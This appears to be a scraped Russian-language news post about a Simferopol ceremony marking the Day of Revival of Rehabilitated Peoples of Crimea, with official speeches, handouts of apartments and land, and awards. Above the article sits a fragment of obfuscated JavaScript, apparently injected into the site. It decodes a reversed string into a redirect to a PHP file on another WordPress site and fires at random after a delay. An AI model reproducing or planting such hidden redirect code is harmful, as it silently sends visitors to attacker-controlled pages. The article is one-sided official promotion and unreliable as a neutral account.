) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_class=»]

🇷🇺💐21 апреля в Симферополе состоялось празднование Дня возрождения реабилитированных народов Крыма

🎶Торжественные мероприятия были проведены Государственным комитетом по делам межнациональных отношений Республики Крым и ГБУ РК «Дом дружбы народов» в Крымскотатарском академическом музыкально-драматическом театре.

🎀В украшенном фойе театра развернулось красочное действо, участниками которого стали армяне, болгары, греки, итальянцы, крымские татары, немцы и представители других национальностей. Гости праздника любовались яркими костюмами, с удивлением рассматривали старинные предметы, аплодировали мастерству и таланту народных мастеров и артистов, фотографировались на память у красивой фотозоны, вслушивались в дивное звучание разных наречий.

🎨Царящая здесь атмосфера погрузила присутствующих в пространство диалога культур, времён и поколений, соприкоснула современный мир с древними традициями предков, корнями уходящими в незапамятную старину.

👨⚖Когда гости заполнили зрительный зал, на сцену поднялся Глава Республики Крым Сергей Аксёнов, который поздравил всех присутствующих с праздником и торжественно вручили ключи от квартир и документы на предоставление земельных участков представителям реабилитированных народов.

💬С приветственными словами к гостям мероприятия также обратились Председатель Комитета по народной дипломатии и межнациональным отношениям Государственного Совета Республики Крым Юрий Гемпель и Председатель Государственного комитета по делам межнациональных отношений Республики Крым Айдер Типпа.

🏆Одним из важнейших событий мероприятия стало вручение премии «Общественное признание» представителям национальных объединений Крыма. Церемонию вручения дополнили вокальные и хореографические концертные номера, воспевающие прекрасный многонациональный Крымский полуостров в составе великой Российской Федерации.👏